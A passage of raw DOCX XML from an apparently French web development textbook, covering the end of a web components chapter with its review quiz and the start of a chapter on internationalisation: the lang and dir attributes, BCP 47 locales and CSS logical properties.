          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>action</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : lien vers la fiche produit</w:t>
        <w:br/>
        <w:br/>
        <w:t>### Événements</w:t>
        <w:br/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>carte:selection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>detail.id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, émis au clic sur l'action</w:t>
        <w:br/>
        <w:br/>
        <w:t>### Accessibilité</w:t>
        <w:br/>
        <w:t>- Le titre alimente le nom accessible du groupe.</w:t>
        <w:br/>
        <w:t>- L'état actif ne doit pas être la seule indication visuelle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un tableau d'attributs évite les allers-retours dans le code source.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La section accessibilité fixe les obligations du composant et de ses utilisateurs.</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 standard isole les styles d'un composant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Le shadow DOM</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Les couches de cascade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 xml:space="preserve">Les attributs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>data-*</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Les media queries</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 se passe-t-il quand un élément est déplacé dans le DOM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Rien</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disconnected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> puis </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>connected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> se déclenchent</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constructor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> est rappelé</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L'élément est détruit</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Quel mécanisme traverse le shadow DOM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Les sélecteurs de classe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Les propriétés personnalisées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Les media queries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Les identifiants</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 xml:space="preserve">À quoi sert </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>::part</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À créer un slot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À exposer un élément interne au style externe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À définir un attribut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À charger un module</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Combien de niveaux de jetons distingue-t-on couramment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Deux ou trois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Dix</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Aucun</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A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Le shadow DOM crée un sous-arbre dont les styles sont confinés.</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Le déplacement implique un retrait puis une réinsertion.</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Les propriétés CSS personnalisées sont héritées à travers la frontière.</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Il ouvre une porte de personnalisation contrôlée.</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Primitives, sémantiques et parfois jetons de composant.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>39. Internationalisation et contenu multilingue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Un site qui change de langue, de sens de lecture et de format sans casser sa mise en page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 45 · Niveau : Avancé · Prérequis : chapitre 38</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Déclarer correctement la langue d'un document.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Produire des mises en page compatibles avec l'écriture de droite à gauche.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Formater dates, nombres et devises avec </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Intl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w: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Gérer les pluriels et les traductions sans concaténation.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Organiser les fichiers de traduction d'un projet.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>39.1 Trois mots à distinguer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'internationalisation prépare le code à toutes les langues. La localisation adapte un produit à un marché précis. La traduction n'est qu'une partie de la localisation : une date, une monnaie, une adresse ou une couleur peuvent aussi changer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.124 — Quatre termes souvent confondus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8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Terme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Portée</w:t>
            </w:r>
          </w:p>
        </w:tc>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Exemple</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2862"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Internationalisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Code et structure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3005"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>lang</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dir</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Intl</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="286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Localisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Contenu et usages</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Formats, images, ton</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2862"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Traduction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Texte</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Fichiers de messages</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="286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Adaptation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Produit et marché</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Paiement, droit, support</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LOCALE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Identifiant de langue et de région, au format BCP 47 : </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>fr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>fr-CA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>pt-BR</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>zh-Hans</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>. Il ne désigne pas seulement une langue mais un ensemble de conventions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>39.2 Déclarer la langue et le sens</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">L'attribut </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> n'est pas décoratif : il détermine la prononciation du lecteur d'écran, la césure, la correction orthographique et le rendu des caractères chinois ou japonais.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une langue déclarée au bon endroit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&lt;!doctype html&gt;</w:t>
        <w:br/>
        <w:t>&lt;html lang="fr"&gt;</w:t>
        <w:br/>
        <w:t>&lt;head&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;meta charset="utf-8"&gt;</w:t>
        <w:br/>
        <w:t>&lt;/head&gt;</w:t>
        <w:br/>
        <w:t>&lt;body&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;h1&gt;Notre équipe&lt;/h1&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;p&gt;Notre partenaire s'appelle &lt;span lang="en"&gt;Northwind Traders&lt;/span&gt;.&lt;/p&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  &lt;!-- Sens de lecture : rtl pour l'arabe et l'hébreu --&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;div lang="ar" dir="rtl"&gt;مرحبا بكم في موقعنا&lt;/div&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  &lt;!-- Un extrait de code reste de gauche à droite --&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;code dir="ltr" lang="en"&gt;npm install&lt;/code&gt;</w:t>
        <w:br/>
        <w:t>&lt;/body&gt;</w:t>
        <w:br/>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.125 — Cinq cas de déclaration</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8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Situation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Déclaration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="257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Raison</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2862"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Document principal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3577"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;html lang="fr"&gt;</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Langue par défaut</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="286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Citation en anglais</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3577"/>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&lt;q lang="en"&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>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Prononciation correcte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2862"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Nom propre étranger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3577"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;span lang="en"&gt;</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Césure et synthèse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="286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Bloc de code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3577"/>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lang="en"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dir="ltr"</w:t>
            </w:r>
          </w:p>
        </w:tc>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Lecture technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2862"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Page en arabe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3577"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>lang="ar" dir="rtl"</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Sens de lecture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`DIR="RTL"` NE SUFFIT PAS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Une page écrite avec </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>margin-left</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>float: left</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> restera cassée en arabe. Il faut employer les propriétés logiques dès le départ : </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>margin-inline-start</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>padding-inline-end</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>inline-size</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
